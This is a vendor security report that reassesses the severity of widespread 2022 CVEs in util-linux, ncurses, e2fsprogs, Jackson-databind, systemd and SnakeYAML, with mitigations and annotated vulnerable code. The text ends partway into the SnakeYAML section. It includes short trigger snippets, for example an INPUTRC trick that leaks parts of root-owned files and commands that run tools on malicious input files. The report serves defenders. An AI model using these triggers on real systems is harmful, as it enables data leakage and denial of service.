2023 JFrog Security Research Report

In-depth Analysis of Open Source

Security Vulnerabilities Most
Impactful to DevOps and
DevSecOps Teams

All rights reserved 2023 © JFrog Ltd

Contents
Glossary
.......................................................................................................................................................................................................................
2
Executive Summary
...................................................................................................................................................................................................
3
Key Findings
................................................................................................................................................................................................................
4-5
JFrog Security Recommendations for 2023
............................................................................................................................................................
6-8
Vulnerability Analysis and Findings .........................................................................................................................................................................
9
#1 CVE-2022-0563 - Data Leakage in util-linux
...................................................................................................................................................
10-11
#2 CVE-2022-29458 - Denial of service in ncurses
.............................................................................................................................................
12-14
#3 CVE-2022-1304 - Local privilege escalation in e2fsprogs
.............................................................................................................................
15-17
#4 + #5 CVE-2022-42003 / CVE-2022-42004 - Denial of service in Jackson-databind
......................................................................................
18-21
#6 CVE-2022-3821 - Denial of service in systemd
..............................................................................................................................................
22-23
#7 CVE-2022-1471 - Remote code execution in SnakeYAML
.............................................................................................................................
24-27
#8 + #9 + #10 CVE-2022-41854 / CVE-2022-38751 / CVE-2022-38750 - Denial of service in SnakeYAM

........................................................
28-30
Authors Biographies ..................................................................................................................................................................................................
31

All rights reserved 2023 © JFrog Ltd www.jfrog.com 1

Glossary

CVE Common Vulnerabilities and Exposures. A glossary JFrog The severity of the CVE, as defined by JFrog’s Security
that classifies vulnerabilities, managed by the NVD (a Severity Research team. The severity uses the following levels -
U.S government repository of standards). Used in this Low, Medium, High, Critical.
report to denote “A publicly-known vulnerability,
referred to by its unique ID such as CVE-2022-3602”.

CVSS Common Vulnerability Scoring System. A vulnerability Affected The number of artifacts present in JFrog’s Artifactory
severity score ranging from 0 to 10 (most severe), Artifacts
Cloud that have been found vulnerable to a specific
given to each CVE. The score reflects how hard the CVE. Based on anonymous usage statistics from the
vulnerability is to exploit and how much damage it JFrog Artifactory Cloud.
can cause once exploited. The score is meant to help
users decide which vulnerabilities are crucial to fix.

CNA CVE Numbering Authority. Groups that are authorized NVD The National Vulnerability Database (NVD) severity
by the CVE Program to assign CVE IDs to Severity rating of any CVE, officially defined by its CVSS
vulnerabilities and publish CVE Records within their according to the following ranges -
own specific scopes of coverage.
CVSS Range NVD Severity
0.0 None
0.1 - 3.9 Low
4.0 - 6.9 Medium
7.0 - 8.9 High
9.0 - 10.0 Critical

All rights reserved 2023 © JFrog Ltd www.jfrog.com 2

Executive Summary

This report is designed to provide developers, DevOps engineers, true severity and publishes this information for the benefit of the

security researchers, and information security leaders with timely, community and all JFrog customers.

relevant insight on the security vulnerabilities aiming to inject This report is based on a sampling of the vulnerabilities most

risks into their software supply chains. The information provided often detected in the calendar year 2022 via anonymous usage

herein will help you make more informed decisions on how to statistics from the JFrog Platform.

prioritize remediation efforts to address and mitigate the

potential impact of all known software vulnerabilities, to ensure Each vulnerability includes a summary of the commercial status

your products and services are secure.

and severity of the issue, plus an in-depth analysis of each

vulnerability, which exposes several new technical details about

JFrog is in a unique position to detail the impact of security its impact on today’s enterprise systems. This should enable

vulnerabilities on software artifacts actually in use within today’s security teams to better evaluate if they are actually impacted by

FORTUNE 100 companies. Thus the JFrog Security Research team each issue. This analysis constructs the JFrog Security Research

compiled this first edition of the JFrog annual Critical Vulnerability severity rating for each of the top 10 most prevalent CVEs in 2022,

Exposures (CVEs) report providing an in-depth analysis of the top outlines the notable lessons learned from each, and offers

10 most prevalent vulnerabilities of 2022, their “true” severity guidance to help increase your security posture for 2023.

level, and best practices for mitigating the potential impact of

each. The vulnerabilities contained herein are sorted from high to In addition to each in-depth CVE assessment, this report provides

low based on the number of software artifacts they impacted.

a trend analysis of the total number of CVEs from previous years

that affected the same software components to help deduce

Methodology
which software components are likely to remain vulnerable in

As a designated CNA, the JFrog Security Research team regularly 2023.

monitors and investigates new vulnerabilities to understand their

All rights reserved 2023 © JFrog Ltd www.jfrog.com 3

Key Findings

The majority of vulnerabilities detailed in this report were not as The threat of the CVE may be misleading, if their CVSS rating is
easy to exploit as reported by public sources, and hence high and their real-world impact is negligible (which prompts
undeserving of their high NVD severity rating. Further analysis maintainers to ignore them).

of each CVE revealed that many of them required complex

configuration scenarios or specific conditions under which an The CVSS “attack complexity” metric should reflect
attack could be successfully executed. This underscores the how easy or difficult it is to exploit a vulnerability,
importance of considering the context in which software is but most often it is set too low, which raises the
deployed and utilized when evaluating the impact of any CVE.

severity score without considering the following

Whether the vulnerability is exploitable in a service’s default
Additional security observations made about 2022’s top 10 most
configuration or only under very contrived configuration
prevalent CVEs include:

The likelihood that untrusted data will be parsed by

The CVEs appearing within enterprise most frequently a vulnerable API

are low-severity issues that were never fixed

A recent notable example of this issue was CVE-2022-23529- a
Maintainers of large projects such as Debian and Red Hat must
critical severity (CVSS 9.8), remote-code-execution vulnerability
perform their own analysis to understand whether a CVE
present in the widely popular jsonwebtoken npm package. The
affects their project and how to fix it. Often, these maintainers
attack complexity for this issue should have been “High” (leading
discover a CVE that either doesn’t affect their project or is not
to a lower CVSS) since the prerequisites to exploit this issue
very severe, and opt not to fix the issue.
are very contrived and require an attacker to research each target
These unresolved CVE issues subsequently impact many
individually.
systems and that number of affected systems will only grow
with time, since no fix will ever be available.

All rights reserved 2023 © JFrog Ltd www.jfrog.com 4

Key Findings

Public severity ratings are overinflated since they ignore the In fact 64% of the top 50 CVEs received a lower JFrog Security
real-world impact of a specific CVE
Research severity rating, while 90% received a lower or equal
The CVSS impact metrics (Confidentiality, Integrity & Availability) severity.
will often be rated according to a theoretical “face value” without
considering the actual impact the attack has on real-world
systems. For example
26% JFrog Severity was equal

A DoS attack that crashes a forked client process is much less

severe than a DoS that crashes an important daemon, but they
will both receive a “High” Availability impact CVSS rating. 10% JFrog Severity was higher (CVSS was underrated)

A buffer overflow that doesn't overwrite any meaningful

variable has essentially no severity, but will still receive a “High” 64% JFrog Severity was lower (CVSS was overrated)

Integrity impact CVSS rating. A great example of this was the

November 2022 OpenSSL CVE-2022-3602, which was widely
feared at first before technical details revealed the Vulnerabilities

vulnerability had no real-world impact. Nevertheless, Critical

CVE-2022-3602 is still rated with a “High” impact rating.

High
The discrepancy between public severity ratings and JFrog
Security research severity assessments can be clearly seen when
comparing the top 50 CVEs of 2022 - In most cases, the Medium
JFrog Security Research CVE severity assessment is lower than
the NVD severity rating, meaning oftentimes these vulnerabilities
Low
are being overhyped.
CVE Severity Rating - NVD vs JFrog NVD JFrog JFrog+NVD

All rights reserved 2023 © JFrog Ltd www.jfrog.com 5

JFrog Security Recommendations for 2023

Following are some suggestions to help developers, DevOps Even if the NVD’s score is higher and cause for alarm, we
engineers, security researchers, and information security leaders recommend trusting the CNA’s assessment and rating since the
combat the confusion caused by overly-hyped vulnerabilities in CNA will usually perform a deeper evaluation on the vulnerability.
2023:

In the example above, the vulnerability should be treated as a

“High” severity issue instead of a “Critical” severity issue.

1. Seek alternative severity scores

Distro-specific severity scores

Similar to how a patient would seek a second medical opinion Major Linux distributions such as Ubuntu and Red Hat have entire
before having major surgery, it’s wise to seek an alternate source security tracker teams that perform their own analysis of reported
of validation for any discovered CVE before setting a remediation vulnerabilities and provide their own severity score, regardless of
plan. There are several reputable sources, beyond the NVD, that whether the vulnerabilities have a CVE ID. Generally speaking, they
can be consulted before prioritizing the remediation of a specific determine their severity scores based on an assessment of the
vulnerability. These alternate sources include: context in which the vulnerability affects users of their distribution.
non-NVD CVSS scores
For example, a vulnerability
CVE-2022-1471 CVE-2022-29458
Vulnerabilities reported by may have critical security
CNAs other than the NVD will impact on a Windows-based
usually list both the NVD 9.8 8.3 environment, but have little to .
7 1 .
6 1

CVSS rating and the CNA’s no impact on Ubuntu Linux.

CVSS score on nvd.nist.gov, Examples like this underscore
ii
Cr t cal High the importance of context High Low
providing you with a side-by-
NIST: NVD CNA: Google Inc. when evaluating and designing NIST: NVD RedHat
side comparison.
https://nvd.nist.gov/vuln/detail/CVE-2022-1471
remediation strategies around https://nvd.nist.gov/vuln/detail/CVE-2022-29458

any CVEs.
https://access.redhat.com/security/cve/cve-2022-29458

All rights reserved 2023 © JFrog Ltd www.jfrog.com 6

JFrog Security Recommendations for 2023

Project-specific severity scores

Project

Security Tracker

Several popular software projects (see list below for examples)

maintain a database of vulnerabilities that affect their project and Apache Web Server

https://httpd.apache.org/security/vulnerabilities_24.html

assign their own severity scores for each CVE, which is often
Nginx

https://nginx.org/en/security_advisories.html

different from the NVD severity rating for the same issue. For
example the following vulnerability in “curl” - OpenSSL

https://www.openssl.org/news/vulnerabilities.html

CVE-2022-27781 Django

https://docs.djangoproject.com/en/4.1/releases/security/

Curl

https://curl.se/docs/security.html

7.5 Node.js

https://nodejs.org/en/blog/

Spring framework
https://tanzu.vmware.com/security
Low High
CURL Project NIST: NVD

https://curl.se/docs/CVE-2022-27781.html https://nvd.nist.gov/vuln/detail/cve-2022-27781 2. For critical issues, take social media into account

In late October 2022, another high-profile CVE event arose from

When evaluating CVE ratings from these sources, we recommend the planned release of a critical OpenSSL vulnerability (now
trusting the project-specific severity score over NVD, since the known as CVE-2022-3602). Due to the rarity of an OpenSSL critical-
project maintainers can perform a deeper analysis of the severity issue and the overwhelming popularity of OpenSSL, social
vulnerability in the context of their project, providing greater media was flooded with hundreds of messages about this issue
insight to the impact of the CVE in real-world scenarios.
expecting a “Log4Shell”-level event. After further details about the
Below is a short list of popular projects with reputable severity vulnerability emerged, it became clear the issue had slim to no
score methodologies:

real-world impact.

All rights reserved 2023 © JFrog Ltd www.jfrog.com 7

JFrog Security Recommendations for 2023

By the beginning of December, social chatter on CVE-2022-3602 had been reduced to less than 10 daily tweets, thus reflecting the real (very
low) criticality of this issue. When evaluating the severity of any CVE, we recommend consulting cvetrends.com, which validates Twitter's
filtered stream API by combining it with data from NIST's NVD, Reddit, and GitHub APIs.

https://cvetrends.com/

All rights reserved 2023 © JFrog Ltd www.jfrog.com 8

Vulnerability Analysis and Findings

This section provides visibility into 2023 security trends and

makes recommendations based on our analysis of the10 most
widespread vulnerabilities discovered in 2022. As described JFrog Advanced Security

above, the vulnerability proliferation is calculated using JFrog Advanced Security augments JFrog Xray’s software
anonymous usage statistics from the JFrog Platform. Each
______________ composition analysis capabilities with new in-depth binary
vulnerability includes security scanning, allowing a whole new understanding of the
Impact Analysis - Summary of the vulnerability’s real-world security state of binaries, especially container images.

impac Advanced scanners identify security issues that mostly can’t be

found via source code analysis alone. New advanced security
Technical Vulnerability Details - A high-level description of the
features are
vulnerability, its attack vectors and its severity, without diving
Container contextual analysis - Determines whether the
into the vulnerable source code
CVEs discovered are actually exploitable in the application
Contextual Analysis - How to detect whether the CVE is
Infrastructure-as-Code (IaC) Security - Scans IaC files for
exploitable in your local environment
early detection of cloud or infrastructure misconfigurations,
Mitigation Options - How to mitigate the vulnerability’s impact preventing attacks and data leaks in production
even without upgrading the vulnerable component Exposed Secrets Detection - Detects any secrets left exposed
Vulnerability In-Depth Details - For select vulnerabilities, in containers to stop accidental leak of passwords, internal
additional technical analysis of the vulnerability via annotation tokens or credentials
of the vulnerable source code Insecure use of Libraries and Services - Detects whether
Trend Analysis - For select vulnerabilities, the number of CVEs common OSS libraries and services are used correctly and
configured securely.
from previous years that affected this component and our
forecast on the number of CVEs to expect in 2023 for this
component.

All rights reserved 2023 © JFrog Ltd www.jfrog.com 9

Vulnerability Analysis and Findings #1 CVE-2022-0563 - Data Leakage in util-linux

#1 CVE-2022-0563 - Data Leakage in util-linux Technical Vulnerability Details

# A ffected Artifacts 41,109

util-linux is a random collection of Linux utilities. chsh is used
to change the login shell. chfn is used to change finger
Short Description util-linux Design Problem
information.

Impact Data Leakage

The GNU Readline library provides a set of functions for use by
NVD Severity Rating Medium (CVSS 5.5)
applications that allow users to edit command lines as they are
rog Severity Rating Low
JF
typed in.

i ed Versions
F x 2.37.4
The readline library accepts an INPUTRC parameter as an
environment variable. Passing this environment variable causes
Impact Analysi readline to load the file in the chfn and chsh process, which is
This CVE showed up most frequently throughout the year, running as UID 0 (root setuid).

likely because it was reported to affect all versions of Debian, Parsing this file will lead to errors being printed to standard
an extremely popular Linux distribution output when reading lines that begin with certain strings such as
Unfixed due to unimportant urgency or potential of "-" and lines that do not contain an expected character. These
exploitatio error messages contain only parts of the file, which is the core of
In reality, most major distros are not affected by this the issue.

vulnerability (ex. Alpine, Debian and Ubuntu

Vulnerable CLI utils are provided by an unaffected packag The major Linux distributions: Alpine, Debian and Ubuntu don’t
This CVE has a moderate severity even in worst case scenario, use the util-linux package to compile chsh and chfn - instead
i.e. a local attacker can partially dump root-owned files they use the shadow package which isn’t vulnerable to this issue.

All rights reserved 2023 © JFrog Ltd www.jfrog.com 10

Vulnerability Analysis and Findings #1 CVE-2022-0563 - Data Leakage in util-linux

Also, Red Hat compiles util-linux without linking the

The following reasons lower the issue's severity
vulnerable readline library.

All major Linux distributions don’t use a vulnerable version

Since both of these tools have root-setuid permissions by default, of the chfn and chsh
a local attacker can in theory leak partial data from arbitrary (root- The file contents that can be leaked are only partial
owned) files in the system by running them with an arbitrary The attack must be performed locally, which limits the
INPUTRC environment variable.
amount of attackers that are able to exploit this issue
When manually compiling the tools from source, the setuid
But, when manually compiling util-linux from a vulnerable flag is removed from the tools, thus losing access to leak root
source, and installing this version on the system, the utilities lose files content.

their setuid flag. This is a feature of Linux systems that removes

the setuid after a file has been modified. It must be manually Contextual Analysis

enabled again using chmod u+s to read root-owned files.

JFrog's contextual analysis scanner checks whether the chfs and

chfn CLI utilities are compiled with readline support, by
The JFrog Security Research team gave this vulnerability a Low
checking for the “readline” import symbol in the ELF header.

severity rating.

Vulnerable Command-line Snippet

INPUTRC={attacker_controlled_file} chfn

Mitigation Options

If a vulnerable version of util-linux was compiled manually,

remove the SUID bit from the chsh and chfn tools using the
chmod u-s command on them.

All rights reserved 2023 © JFrog Ltd www.jfrog.com 11

Vulnerability Analysis and Findings #2 CVE-2022-29458 - Denial of service in ncurses

#2 CVE-2022-29458 - Denial of service in ncurses

# Affected Artifacts 36,451

Short Description ncurses Out-of-Bounds Read

Impact Denial-of-Service

NVD Severity Rating High (CVSS 7.1)

JFrog Severity Rating Low

Fixed Versions 6.3 patch 20220416

Impact Analysi Technical Vulnerability Details

Extremely widespread CVE since the maintainers did not fix the ncurses (new curses) is a programming library providing an
issue on all Debian version application programming interface (API) that allows the
Exploitation of this issue is extremely unlikely because ncurses programmer to write text-based user interfaces (TUI) in a terminal-
must be running on a client utility with an externally-controlled independent manner. It is a toolkit for developing "GUI-like"
file as input; and that client utility does not usually receive application software that runs under a terminal emulator.

external input
The denial of service (DoS) impact is minimal because crashing a In April 2022, a security researcher reported a bug found by a new
forked client process does not usually cause an issue with fuzzer being tested. A log of the crash with AddressSanitizer was
availability attached to the report. The vulnerability was labeled an Out-of-
Bounds Read that leads to a denial-of-service (DoS) and possibly
Data leakage is even more rare because the attacker must
unintended information disclosure.
extract the utility’s output file after launching the attack.

All rights reserved 2023 © JFrog Ltd www.jfrog.com 12

Vulnerability Analysis and Findings #2 CVE-2022-29458 - Denial of service in ncurses

The JFrog Security Research team gave this vulnerability a Low Mitigation Options

severity rating.
No mitigation is available for this issue, other than upgrading the
vulnerable component.
The following reasons lower the issue's severity
The attacker must be able to control the contents of the
terminfo source file when the tic command is run, which is
a highly unlikely remote scenario.
tic -o /path/to/output/folder/ <TIC_SOURCE_FILEPATH>
The DoS impact is mitigated by the fact the only known
attack vector is running and crashing a forked process (tic),
which does not impact the parent process
The attacker must find a way to get the output file with the
leaked memory information, which is very unlikely.

Contextual Analysis

The applicability of CVE-2022-29458 can be detected by looking

for tic CLI utility executions with a file argument, where the file
contents can be attacker-controlled.

Vulnerable Command-line Snippet

tic -o /tmp {malicious_source_file}

All rights reserved 2023 © JFrog Ltd www.jfrog.com 13

Vulnerability Analysis and Findings #2 CVE-2022-29458 - Denial of service in ncurses

Vulnerability In-Depth Details

LOW_MSB and VALID_STRING is defined in the include/tic.h file:
The CVE-2022-29458 vulnerable function is inside the:

tinfo/read_entry.c file:

#define LOW_MSB(p) (BYTE(p,0) + 256*BYTE(p,1))

#define CANCELLED_STRING (char *)(-1)

#define ABSENT_STRING (char *)0

#define MyNumber(n) (short) LOW_MSB(n)

#define VALID_STRING(s) ((s) != CANCELLED_STRING && (s) != ABSENT_STRING)

static void

convert_strings(char *buf, char **Strings, int count, int size, char *table)

int i;

char *p;
On [1], the Strings[i] variable is assigned using the buffer and
for (i = 0; i < count; i++) {

if (IS_NEG1(buf + 2 * i)) {
the i counter.

Strings[i] = ABSENT_STRING;

} else if (IS_NEG2(buf + 2 * i)) {

It then verifies on [2] that the first byte of Strings[i] is neither a

Strings[i] = CANCELLED_STRING;
0x00 nor 0xFF.

} else if (MyNumber(buf + 2 * i) > size) {

Strings[i] = ABSENT_STRING;
If the verification passes, it iterates on [3] over the string, until it
} else {

Strings[i] = (MyNumber(buf + 2 * i) + table); [1]

reaches a null-terminator [4]. The OOB-Read happens on [4] when
TR(TRACE_DATABASE, ("Strings[%d] = %s", i, _nc_visbuf(Strings[i])));

the p pointer is reading outside the bounds of the supplied buffer

}

(no check that the index supplied to String[] is in-bounds).

/* make sure all strings are NUL terminated */

if (VALID_STRING(Strings[i])) { [2]

for (p = Strings[i]; p < table + size; p++) [3]

if (*p == '\0') [4]

break;

/* if there is no NUL, ignore the string */

if (p >= table + size)

Strings[i] = ABSENT_STRING;

All rights reserved 2023 © JFrog Ltd www.jfrog.com 14

Vulnerability Analysis and Findings #3 CVE-2022-1304 - Local privilege escalation in e2fsprogs

Technical Vulnerability Details

#3 CVE-2022-1304 - Local privilege escalation in e2fsprogs

e2fsprogs is a set of utilities for maintaining the ext2, ext3 and

# A ffected Artifacts 32,992
ext4 file systems. Since those file systems are often the default for
Short Description e2fsck Out-of-Bounds Write Linux distributions, e2fsprogs is commonly considered essential
I mpact Local Privilege Escalation software.

NV D Severity Rating High (CVSS 7.8)

In March 2022, a security researcher discovered CVE-2022-1304
JF rog Severity Rating Low while using a new fuzzer and a log of the crash with Valgrind was
F x i ed Versions 1.46.6-rc1
attached to the report.

The vulnerability is an Out-of-Bounds Write that may lead to a

Impact Analysi local privilege escalation. It has no technical writeup nor an
Extremely widespread issue since it was not fixed in all Debian exploit demonstrating code execution (local privilege
versions (buster, bullseye and stretch escalation). With this in mind, it is only possible to cause a
massive buffer overflow with a negative integer value, which
Exploitation is only likely by a local attacker who would run a
leads to DoS attack, but won’t lead to code execution.
client utility with an externally-controlled file as input
Our analysis shows the only DoS impact that is likely, is
The out-of-bounds write is caused by a huge memory copy
that causes a cras
The copy size cannot be controlle
Any DoS impact is highly mitigated, since crashing a forked
client process usually has no availability impact.

All rights reserved 2023 © JFrog Ltd www.jfrog.com 15

Vulnerability Analysis and Findings #3 CVE-2022-1304 - Local privilege escalation in e2fsprogs

The JFrog Security Research team gave this vulnerability a Low Vulnerable Command-line Snippet

severity rating.
e2fsck -p -f {malicious_disc_image_file}

The following reasons lower the issue's severity Mitigation Options

The attack must be performed locally (as it’s highly unlikely a No mitigation is available for this issue, other than upgrading the
remote service would use the e2fsck on externally supplied vulnerable component.
input), which limits the amount of attackers that are able to
exploit this issue
Vulnerability In-Depth Details

A Proof-of-Concept which leads to a Denial-of-Service was

On [1], the path->left variable is of type signed integer and can
published by the reporting researcher
The e2fsprogs tools are userland utilities, thus not affecting be a negative number, thus passing the check. Then, on [2] a
the Linux kernel and cannot lead to a container escape memmove is moving data with a size of path->left *
No privilege escalation exploit is available.

sizeof(struct ext3_extent_idx). Because memmove takes

the size argument as size_t, which is an unsigned integer, the
The following reasons raise the issue's severity path->left negative signed integer is converted to a very big
A Proof-of-Concept which leads to a Denial-of-Service was
unsigned integer.

published by the reporting researcher.

This results in a very big memmove than originally was intended,

moving data past the original buffer and resulting in an overflow.

All rights reserved 2023 © JFrog Ltd www.jfrog.com 16

Vulnerability Analysis and Findings #3 CVE-2022-1304 - Local privilege escalation in e2fsprogs

rrcode_t ext2fs_extent_delete(ext2_extent_handle_t handle, int flags)

struct extent_path {

{
char *buf;

struct extent_path *path;

int entries;

char *cp;

struct ext3_extent_header *eh;

int max_entries;

errcode_t retval = 0;
int left;

int visit_num;

EXT2_CHECK_MAGIC(handle, EXT2_ET_MAGIC_EXTENT_HANDLE);

int flags;

if (!(handle->fs->flags & EXT2_FLAG_RW))

blk64_t end_blk;

return EXT2_ET_RO_FILSYS;
void *curr;

};
if (!handle->path)

return EXT2_ET_NO_CURRENT_NODE;

#ifdef DEBUG

struct ext2fs_extent extent;

retval = ext2fs_extent_get(handle, EXT2_EXTENT_CURRENT,

&extent);

if (retval == 0) {

printf("extent delete %u ", handle->ino);

dbg_print_extent(0, &extent);

#endif

path = handle->path + handle->level;

if (!path->curr)

return EXT2_ET_NO_CURRENT_NODE;

cp = path->curr;

if (path->left) { [1]

memmove(cp, cp + sizeof(struct ext3_extent_idx),

path->left * sizeof(struct ext3_extent_idx)); [2]

path->left--;

} else {

struct ext3_extent_idx *ix = path->curr;

ix--;

path->curr = ix;

All rights reserved 2023 © JFrog Ltd www.jfrog.com 17

 #4 + #5 CVE-2022-42003 / CVE-2022-42004

Vulnerability Analysis and Findings Denial of service in Jackson-databind

Technical Vulnerability Details

#4 + #5 CVE-2022-42003 / CVE-2022-42004

Jackson-databind is a streaming API library for Java. One of its

Denial of service in Jackson-databind
components, ObjectMapper is responsible for serialization and
# Affected Artifacts 29,325 / 28,169
deserialization from various data formats (most notably JSON) to
Short Description Jackson-databind Stack Exhaustion Java objects, and vice versa.

Impact Denial-of-Service
JFrog Security Research discovered that when the non-default
NVD Severity Rating High (CVSS 7.5) UNWRAP_SINGLE_VALUE_ARRAYS deserialization option is
JFrog Severity Rating Medium enabled, the deserialization of a deeply nested JSON array (via
calls to readTree/readValue/readValues with untrusted input)
Fixed Versions CVE-2022-42003: 2.12.7.1 and 2.13.4.1

CVE-2022-42004: 2.12.7.1 and 2.13.4

could cause stack exhaustion and subsequently crash the process.

The issue is likely to be exploited in vulnerable configurations

Impact Analysi
since a public exploit exists.

CVE-2022-42003 was extremely widespread since Jackson is

the #1 ranked JSON parser for Java (according to Maven)
The JFrog Security Research team gave this vulnerability a
The available patch is only 2 months old, so many have not yet Medium severity rating.

upgraded
It is likely that Jackson will be used to parse untrusted JSON
data, however - exploitation requires that Jackson be initialized
with a non-default value, which is highly unlikely
There is a moderate risk CVE-2022-42003 will cause a DoS
impact on library usage.

All rights reserved 2023 © JFrog Ltd www.jfrog.com 18

Vulnerability Analysis and Findings #4 + #5 CVE-2022-42003 / CVE-2022-42004

Denial of service in Jackson-databind

M itigation Options

T he following reasons lower the issue's severity

Do not include the UNWRAP_SINGLE_VALUE_ARRAYS
T he attacker must find remote input that gets deserialized by
deserialization feature. Specifically, remove this line from the code
Jackson-databind via a readTree/readValue/readValues API
call. In addition, the mapper must enable the non-default of the vulnerable application -

mapper.enable(JsonParser.Feature.UNWRAP_SINGLE_VALU
UNWRAP_SINGLE_VALUE_ARRAYS feature.

E_ARRAYS);

T he following reasons raise the issue's severity

A crashing Proof-of-Concept is available through OSS-fuzz.
Vulnerability In-Depth Details

T his is an in-depth analysis of CVE-2022-42004:

Contextual Analysis
/**

JFrog's contextual analysis scanner checks whether the non- * M ain deserialization method fo r bean-based objects (POJOs).

*/

default option UNWRAP_SINGLE_VALUE_ARRAYS is enabled and @Ov erride

p ublic Obj ect deserialize(JsonParser p, D eserializationContext ctxt)

attacker-controlled data is read via readTree/ readValue/ throws IOException [1]

readValues.

if (p.i sExpectedStartObjectToken()) {

if ( _vanillaProcessing) {

return anillaDeserialize(p, extToken());

Vulnerable Code Snippet

v ctxt, p.n

p.n extToken();

if (_objectIdReader != null) {

ObjectMapper mapper = new ObjectMapper();

return deserializeWithObjectId(p, ctxt);

mapper.enable(DeserializationFeature.UNWRAP_SINGLE_VALUE_ARRAYS);

mapper.readTree(untrusted_data);

return deserializeFromObject(p, ctxt);

return _deserializeOther(p, ctxt, p.c urrentToken()); [2]

All rights reserved 2023 © JFrog Ltd www.jfrog.com 19

 #4 + #5 CVE-2022-42003 / CVE-2022-42004

Vulnerability Analysis and Findings Denial of service in Jackson-databind

protected final Object _deserializeOther(JsonParser p, @Override

DeserializationContext ctxt,
protected Object _deserializeFromArray(JsonParser p,
JsonToken t) throws IOException
DeserializationContext ctxt) throws IOException

{
{

if (t != null) {
.....................

switch (t) {
final CoercionAction act = _findCoercionFromEmptyArray(ctxt);

......................
final boolean unwrap =
case START_ARRAY:
ctxt.isEnabled(DeserializationFeature.UNWRAP_SINGLE_VALUE_ARRAYS);

// these only work if there's a (delegating) creator,

or UNWRAP_SINGLE_ARRAY
if (unwrap || (act != CoercionAction.Fail)) {

return _deserializeFromArray(p, ctxt); [3]

.....................

......................
if (unwrap) { [4]

default:
final Object value = deserialize(p, ctxt); [5]

}
if (p.nextToken() != JsonToken.END_ARRAY) {

}
handleMissingEndArrayForSingle(p, ctxt);

return ctxt.handleUnexpectedToken(getValueType(ctxt), p);

}

} return value;

return ctxt.handleUnexpectedToken(getValueType(ctxt), p);

All rights reserved 2023 © JFrog Ltd www.jfrog.com 20

 #4 + #5 CVE-2022-42003 / CVE-2022-42004

Vulnerability Analysis and Findings Denial of service in Jackson-databind

The main deserialization function in BeanDeserializer.java is On July 22, 2019, a blog-post regarding CVE-2019-12384 in
[1].
Jackson-databind was published by Doyensec company.

On [2], the _deserializeOther() function is called. Then, on [3] The post was shared on /r/netsec subreddit on that same day.

the _deserializeFromArray() function is called to deserialize

an array.
On October 6, 2019, Debian patched 6 Jackson-databind CVEs, and
It then verifies on [4] that the UNWRAP_SINGLE_VALUE_ARRAYS that patch was featured on Hacker News.

feature is enabled.

jackson-databind CVEs
On [5] it calls the deserialize() function again.
90

80
This results in an endless loop that was not intended ([1]->[5]->[1] 70

and so on), adding function calls to the call stack and ultimately 60

50

resulting in a stack exhaustion.

40

30

20

Trend Analysis

10

0
2019 2020 2021 2022
The following graph displays the number of CVEs affecting
jackson-databind disclosed over each of the last 3 years.

Those were the catalysts to several, subsequent CVEs, most of

which were serialization gadgets to bypass the blacklist by
What to expect in 2023?
individual researchers and not separate vulnerabilities.

Jackson-databind deserialization vulnerabilities have existed since Version 2.10 introduced a new API that allows developers to safely
2017. Around the end of that year, the author of the package use Polymorphic typing.

released a Medium article: On Jackson CVEs: Don’t Panic — Therefore the number of Jackson-databind CVEs decreased and
Here is what you need to know.
is expected to remain low, since polymorphic typing CVEs
accounted for the bulk of all reported CVEs.

All rights reserved 2023 © JFrog Ltd www.jfrog.com 21

Vulnerability Analysis and Findings #6 CVE-2022-3821 - Denial of service in systemd

Technical Vulnerability Details

#6 CVE-2022-3821 - Denial of service in systemd

systemd is a software suite that provides an array of system
# Affected Artifacts 25,131
components for Linux-based operating systems. Its main aim is to
Short Description systemd Buffer Overflow unify service configuration and behavior across Linux
Impact Denial-of-Service distributions.

NVD Severity Rating Medium (CVSS 5.5)

It was discovered that due to an off-by-one error in the
JFrog Severity Rating Low
format_timespan function in time-util.c, a 1-byte out-of-
Fixed Versions 252-rc1 bounds write occurs, which may lead to a DoS attack.

The issue requires control over both arguments of the vulnerable

Impact Analysi
function: t and accuracy. The vulnerable function is inside an
Extremely popular since it was not fixed in all Debian versions internal header file, which isn't exported and is only used by the
(buster and bullseye systemd utilities. No user input is supplied to this function
Unfixed due to it being a “Minor issue through the default systemd utilities.

The vulnerability has no real-world impact. Its internal function

has no external data inputs, and the vulnerability leads to a 1- Also, developing code and linking with the library via -lsystemd
byte overflow, which is usually hard to exploit even for a denial doesn't give access to this function.

of service (DoS) attack.

The JFrog Security Research team gave this vulnerability a Low
severity rating.

All rights reserved 2023 © JFrog Ltd www.jfrog.com 22

Vulnerability Analysis and Findings #6 CVE-2022-3821 - Denial of service in systemd

Vulnerable Code Snippet

The following reasons lower the issue's severity

This sample vulnerable code calls the vulnerable function
The vulnerability requires the attacker to have control over
format_timespan. This function is internal.
both arguments of the vulnerable function format_timepsan,
which is very unlikely since the function is a non-exported
function. Furthermore, there are no systemd CLI utilities that int main() {

pass external data to this function char buf[5];

char *p;

The vulnerability leads to a 1 -byte over fl ow. This error is usec_t t = 100005;

unlikely to cause a crash in real-world environments.

usec_t accuracy = 1000;

p = format_timespan(buf, sizeof(buf), t, accuracy);

printf("%s\n",p);

The following reasons raise the issue's severity return 0;

}
A partial proof of concept (PoC) was published. The PoC is an
internal test that performs a one-byte overwrite, by calling
internal functions.

Mitigation Options

No mitigation is available for this issue.

Contextual Analysis

No contextual analysis is available for this issue since there’s no

Vulnerability In-Depth Details

scenario of triggering it.

No in-depth analysis is available for this issue.

All rights reserved 2023 © JFrog Ltd www.jfrog.com 23

Vulnerability Analysis and Findings #7 CVE-2022-1471 - Remote code execution in SnakeYAML

The vulnerability has a truly critical severity, however,

#7 CVE-2022-1471 - Remote code execution in SnakeYAML
exploiting the issue for remote code execution is trivial and
# Affected Artifacts 25,101
stable.
Short Description SnakeYAML Design Problem The vulnerability scenario is quite likely (parsing untrusted
YAML data while not using the non-default
Impact Remote Code Execution
“SafeConstructor”)
NVD Severity Rating Critical (CVSS 9.8)
No version of SnakeYAML contains a fix for this issue and the
JFrog Severity Rating Critical currently proposed patch is extremely partial, meaning the
Fixed Versions No fixed versions yet
next SnakeYAML version will also be vulnerabl
